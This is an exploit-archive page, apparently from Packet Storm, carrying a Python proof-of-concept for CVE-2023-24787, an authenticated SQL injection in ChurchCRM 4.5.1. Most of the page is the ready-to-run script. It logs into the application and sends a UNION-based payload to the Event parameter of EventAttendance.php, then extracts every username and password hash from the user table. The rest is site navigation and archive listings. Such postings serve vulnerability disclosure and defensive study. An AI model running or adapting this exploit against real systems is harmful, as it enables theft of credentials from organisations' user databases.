ChurchCRM 4.5.1 SQL Injection

ChurchCRM 4.5.1 SQL Injection: Posted Apr 10, 2023; Authored by Arvandy; ChurchCRM version 4.5.1 suffers from a remote authenticated SQL injection vulnerability.; tags | exploit, remote, sql injection; advisories | CVE-2023-24787; SHA-256 | 18250b19447abb7da7e5a175f5595d9f8032640d2a36f28ff32e7cf716d663f5; Download | Favorite | View

ChurchCRM 4.5.1 SQL Injection

# Exploit Title: ChurchCRM 4.5.1 - Authenticated SQL Injection
# Date: 11-03-2023
# Exploit Author: Arvandy
# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24787/CVE-2023-24787.md
# Software Link: https://github.com/ChurchCRM/CRM/releases
# Vendor Homepage: http://churchcrm.io/
# Version: 4.5.1
# Tested on: Windows, Linux
# CVE: CVE-2023-24787

"""
The endpoint /EventAttendance.php is vulnerable to Authenticated SQL Injection (Union-based and Blind-based) via the Event GET parameter.
This endpoint can be triggered through the following menu: Events - Event Attendance Reports - Church Service/Sunday School. 
The Event Parameter is taken directly from the query string and passed into the SQL query without any sanitization or input escaping.
This allows the attacker to inject malicious Event payloads to execute the malicious SQL query.

This script is created as Proof of Concept to retrieve the username and password hash from user_usr table.
"""


import sys, requests

def dumpUserTable(target, session_cookies):    
    print("(+) Retrieving username and password")
    print("")
    url = "%s/EventAttendance.php?Action=List&Event=2+UNION+ALL+SELECT+1,NULL,CONCAT('Perseverance',usr_Username,':',usr_Password),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+from+user_usr--+-&Type=Sunday School" % (target)
    headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'CRM-2c90cf299230a50dab55aee824ed9b08='+str(session_cookies)}              
    r = requests.get(url, headers=headers)
    lines = r.text.splitlines()
    
    for line in lines: 
        if "<td >Perseverance" in line:
            print(line.split("Perseverance")[1].split("</td>")[0])
    
def login(target, username, password):
    target = "%s/session/begin" % (target)
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    data = "User=%s&Password=%s" % (username, password)
    s = requests.session()
    r = s.post(target, data = data, headers = headers)
    return s.cookies.get('CRM-2c90cf299230a50dab55aee824ed9b08')

def main():
    print("(!) Login to the target application")
    session_cookies = login(target, username, password)       
    
    print("(!) Exploiting the Auth SQL Injection to retrieve the username and password hash")
    dumpUserTable(target, session_cookies)

    
if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("(!) Usage: python3 exploit.py <URL> <username> <password>")
        print("(!) E.g.,: python3 exploit.py http://192.168.1.100/ChurchCRM user pass")
        sys.exit(-1)

    target = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    
    main()

Top Authors In Last 30 Days

Red Hat 237 files
indoushka 172 files
Jay Turla 150 files
Ubuntu 78 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

ChurchCRM 4.5.1 SQL Injection

ChurchCRM 4.5.1 SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ChurchCRM 4.5.1 SQL Injection

Share This

ChurchCRM 4.5.1 SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems